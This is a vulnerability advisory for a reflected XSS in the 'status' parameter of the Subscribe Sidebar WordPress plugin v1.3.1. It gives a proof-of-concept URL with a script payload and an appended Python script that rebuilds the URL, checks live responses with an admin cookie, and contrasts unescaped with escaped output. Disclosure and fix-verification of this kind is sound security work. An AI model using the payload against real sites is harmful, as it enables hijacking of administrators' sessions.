Subscribe Sidebar plugin by Blubrry v1.3.1 – Reflected XSS – 20 Jun 2020

Tested against – Subscribe Sidebar plugin by Blubrry v1.3.1 | WordPress v5.4.1

Reflected XSS

[https://wordpress.org/plugins/subscribe-sidebar/](https://wordpress.org/plugins/subscribe-sidebar/)

The “status” GET parameter of the plugin's settings page, “subscribe_sidebar.php” (served under /wp-admin/options-general.php), is reflected into the response without output encoding, so it is vulnerable to reflected XSS. Because the page lives in wp-admin, exploitation requires a logged-in user who can reach the settings page (an administrator) to open a crafted link. The alert(document.cookie) payload only demonstrates script execution: WordPress authentication cookies are set HttpOnly, so a real attacker would use the script to act with the victim's admin session rather than to read the cookie.

POC

/wp-admin/options-general.php?page=subscribe_sidebar.php&status=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E
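The following Python script is an added example and not part of the original advisory or of the plugin's code. It rebuilds the PoC URL above from its parts, classifies whether a response reflects the payload raw (exploitable) or HTML-encoded (fixed), and contrasts a hypothetical vulnerable rendering of the status message with the encoded form a patched plugin should produce. The render functions are a stand-in for what the plugin's PHP presumably does, not its actual source; the base URL and cookie header in the live-check helper are assumptions you supply.

```python
import html
from urllib.parse import urlencode

# Payload, admin path, plugin page and parameter name as given in the advisory.
PAYLOAD = '<script>alert(document.cookie)</script>'
ADMIN_PATH = '/wp-admin/options-general.php'
PLUGIN_PAGE = 'subscribe_sidebar.php'
PARAM = 'status'


def build_poc_url(base_url, payload=PAYLOAD):
    """Build the reflected-XSS PoC URL for a WordPress site at base_url."""
    query = urlencode({'page': PLUGIN_PAGE, PARAM: payload})
    return base_url.rstrip('/') + ADMIN_PATH + '?' + query


def render_status_vulnerable(status):
    """Hypothetical stand-in for the unpatched behaviour: the raw GET value
    is dropped straight into the admin notice markup."""
    return '<div class="updated"><p>' + status + '</p></div>'


def render_status_fixed(status):
    """Hardened form: HTML-encode the value before output. This mirrors what
    WordPress's esc_html() does for the characters in this payload."""
    return '<div class="updated"><p>' + html.escape(status, quote=True) + '</p></div>'


def classify_reflection(response_body, payload=PAYLOAD):
    """Classify how a response reflected the payload.

    'raw'     -> payload appears verbatim; the page is exploitable
    'escaped' -> only an HTML-entity-encoded copy appears; output encoding is in place
    'absent'  -> the parameter is not reflected at all
    """
    if payload in response_body:
        return 'raw'
    if html.escape(payload, quote=True) in response_body:
        return 'escaped'
    return 'absent'


def check_live(base_url, cookie_header, timeout=10):
    """Fetch the PoC URL with an authenticated admin cookie (assumed to be
    supplied by the tester) and classify the reflection. Not run offline."""
    import urllib.request
    req = urllib.request.Request(build_poc_url(base_url),
                                 headers={'Cookie': cookie_header})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        body = resp.read().decode('utf-8', errors='replace')
    return classify_reflection(body)


if __name__ == '__main__':
    # Constructed offline demonstration; 'https://example.test' is a placeholder.
    print(build_poc_url('https://example.test'))
    print('vulnerable rendering:', classify_reflection(render_status_vulnerable(PAYLOAD)))
    print('fixed rendering:     ', classify_reflection(render_status_fixed(PAYLOAD)))
```

Run it without arguments to see the rebuilt PoC URL and the two classifications; to confirm a fix on a real install, call check_live() with the site's base URL and a logged-in administrator's Cookie header and expect 'escaped' rather than 'raw'.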
